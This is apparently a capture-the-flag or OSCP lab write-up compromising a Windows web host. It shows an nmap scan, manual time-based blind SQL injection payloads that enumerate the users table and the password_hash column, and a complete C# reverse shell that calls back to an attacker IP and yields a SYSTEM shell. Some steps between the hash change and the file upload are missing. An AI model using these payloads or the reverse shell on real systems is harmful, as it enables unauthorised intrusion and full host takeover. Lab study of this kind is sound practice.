$ nmap -p- --min-rate 3000 -Pn 192.168.208.63
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-21 12:13 +08
Nmap scan report for 192.168.208.63
Host is up (0.18s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
450/tcp open tserver
5985/tcp open wsman
WinRM is open, which can be used for evil-winrm. FTP does not accept anonymous logins, and SMB requires credentials to view.
Web Enumeration -> Blind SQL Injection
Port 450 shows us a basic login:
Default credentials don't work. Attempting any form of SQL Injection shows this:
So this is definitely vulnerable to SQL Injection. I was unable to bypass this login, so I used sqlmap to verify the type of injection we needed to use.
All of the payloads sqlmap used had the WAITFOR DELAY commands, which means we have to exploit time-based Blind SQLI. While I could dump out the entire database (which could take hours), I wanted to exploit it manually (as per OSCP rules, no sqlmap!).
So first, we can use this to verify that we have SQL Injection:
'IF (1=1) WAITFOR DELAY '0:0:10'--
Afterwards, I enumerated some possible usernames, and found that butch was one of them.
Let's now identify the tables that are present within this database.
'; IF ((select count(name) from sys.tables where name = 'users')=1) WAITFOR DELAY '0:0:10';--
The above payload verifies that users is a table within the database. Now we can check for columns.
'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name='users' and c.name = 'username')=1) WAITFOR DELAY '0:0:10';--
However, there is no passwords column present. In all the boxes I've done, the passwords in the databases I found were always hashed. I googled and read a bit more about the typical naming conventions and authentication mechanisms of MSSQL servers, and found this:
This told me that the column name might be password_hash, and we can vertify this using this payload:
'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name='users' and c.name = 'password_hash')=1) WAITFOR DELAY '0:0:10';--
Now that we have verified the existence of a users and password_hash column with a username of butch, we can actually update this column to have any hash we want. Right now, the hash type is unknown, so let's just try a few common hash algorithms like SHA1 and MD5.
Seems that the website is written in C#, and the file that we upload replaces the . We need to note that this inherits MyNamespacemaster.MyClassMaster, so our code probably needs to include that. I tested by uploading some random C# files, and it caused the site to no longer work.
This means that this file upload might be overwriting the site.master.cs file within the machine, and we need to upload a reverse shell in C#. I used this C# reverse shell script:
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
namespace MyNamespaceMaster
{
public partial class MyClassMaster : MasterPage
{
static StreamWriter streamWriter;
protected void Page_Load(object sender, EventArgs e)
{
using(TcpClient client = new TcpClient("192.168.45.153", 445))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true)
{
strInput.Append(rdr.ReadLine());
//strInput.Append("\n");
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}
}
}
When we upload the file and refresh the page, we get a shell as the SYSTEM user.
